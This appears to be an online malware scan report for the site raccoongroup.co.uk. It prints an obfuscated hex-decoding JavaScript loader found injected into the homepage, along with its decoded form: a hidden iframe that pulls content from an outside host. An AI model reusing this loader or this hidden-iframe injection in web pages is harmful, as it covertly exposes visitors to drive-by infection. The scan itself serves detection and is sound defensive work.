Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=raccoongroup.co.uk
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://raccoongroup.co.uk/ | 200 OK Content-Length: 18651 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function c102916999516l496f08931c4aa(l496f08931cc7a){ function l496f08931d44c(){var l496f08931dc1f=16;return l496f08931dc1f;} return (parseInt(l496f08931cc7a,l496f08931d44c()));}function l496f08931e3ee(l496f08931ebc0){ var l496f08931f390='';l496f0893212d6=String.fromCharCode;for(l496f08931fb63=0;l496f08931fb63<l496f08931ebc0.length;l496f08931fb63+=2){ l496f08931f390+=(l496f0893212d6(c102916999516l496f08931c4aa(l496f08931ebc0.substr(l496f08931fb63,2))));}return l496f08931f390;} var x89='';var Decoded script: <iframe name=c10 src='http://gogo2me.net/.go/check.html' width=745 height=128 style='visibility:hidden'></iframe> Antivirus reports:
Hidden iFrame found. size: 1x1 style: hidden src: http://url/ <iframe src='http://url/' width='1' height='1' style='visibility: hidden;'> | ||
http://raccoongroup.co.uk/about.html | 200 OK Content-Length: 16618 Content-Type: text/html | clean |
http://raccoongroup.co.uk/raccoon_blog/ | 200 OK Content-Length: 27945 Content-Type: text/html | clean |
http://raccoongroup.co.uk/raccoon_blog/../about.html | 200 OK Content-Length: 16618 Content-Type: text/html | clean |
http://raccoongroup.co.uk/raccoon_blog/../raccoon_blog/ | 200 OK Content-Length: 27945 Content-Type: text/html | clean |
http://raccoongroup.co.uk/raccoon_blog/../raccoon_blog/../about.html | 200 OK Content-Length: 16618 Content-Type: text/html | clean |
http://raccoongroup.co.uk/raccoon_blog/../raccoon_blog/../raccoon_blog/ | 200 OK Content-Length: 27945 Content-Type: text/html | clean |
http://raccoongroup.co.uk/raccoon_blog/../raccoon_blog/../raccoon_blog/../about.html | 200 OK Content-Length: 16618 Content-Type: text/html | clean |
http://raccoongroup.co.uk/raccoon_blog/../raccoon_blog/../raccoon_blog/../raccoon_blog/ | 200 OK Content-Length: 27945 Content-Type: text/html | clean |
http://raccoongroup.co.uk/raccoon_blog/../raccoon_blog/../raccoon_blog/../raccoon_blog/../about.html | 200 OK Content-Length: 16618 Content-Type: text/html | clean |
http://raccoongroup.co.uk/raccoon_blog/../raccoon_blog/../raccoon_blog/../raccoon_blog/../raccoon_blog/ | 200 OK Content-Length: 27945 Content-Type: text/html | clean |
http://raccoongroup.co.uk/raccoon_blog/../raccoon_blog/../raccoon_blog/../raccoon_blog/../raccoon_blog/../about.html | 200 OK Content-Length: 16618 Content-Type: text/html | clean |
http://raccoongroup.co.uk/raccoon_blog/../raccoon_blog/../raccoon_blog/../raccoon_blog/../raccoon_blog/../raccoon_blog/ | 200 OK Content-Length: 27945 Content-Type: text/html | clean |
http://raccoongroup.co.uk/raccoon_blog/../raccoon_blog/../raccoon_blog/../raccoon_blog/../raccoon_blog/../raccoon_blog/../about.html | 200 OK Content-Length: 16618 Content-Type: text/html | clean |
http://raccoongroup.co.uk/raccoon_blog/../raccoon_blog/../raccoon_blog/../raccoon_blog/../raccoon_blog/../raccoon_blog/../raccoon_blog/ | 200 OK Content-Length: 27945 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: raccoongroup.co.uk
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 Mar 2015 02:06:08 GMT
Accept-Ranges: bytes
ETag: "15740ba-48db-497bbef299180"
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Vary: Accept-Encoding
Content-Length: 18651
Content-Type: text/html
Last-Modified: Sun, 19 Dec 2010 04:35:34 GMT
...18651 bytes of data.
GET / HTTP/1.1
Host: raccoongroup.co.uk
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 Mar 2015 02:06:08 GMT
Accept-Ranges: bytes
ETag: "15740ba-48db-497bbef299180"
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Vary: Accept-Encoding
Content-Length: 18651
Content-Type: text/html
Last-Modified: Sun, 19 Dec 2010 04:35:34 GMT
...18651 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: raccoongroup.co.uk
Referer: http://www.google.com/search?q=raccoongroup.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: raccoongroup.co.uk
Referer: http://www.google.com/search?q=raccoongroup.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.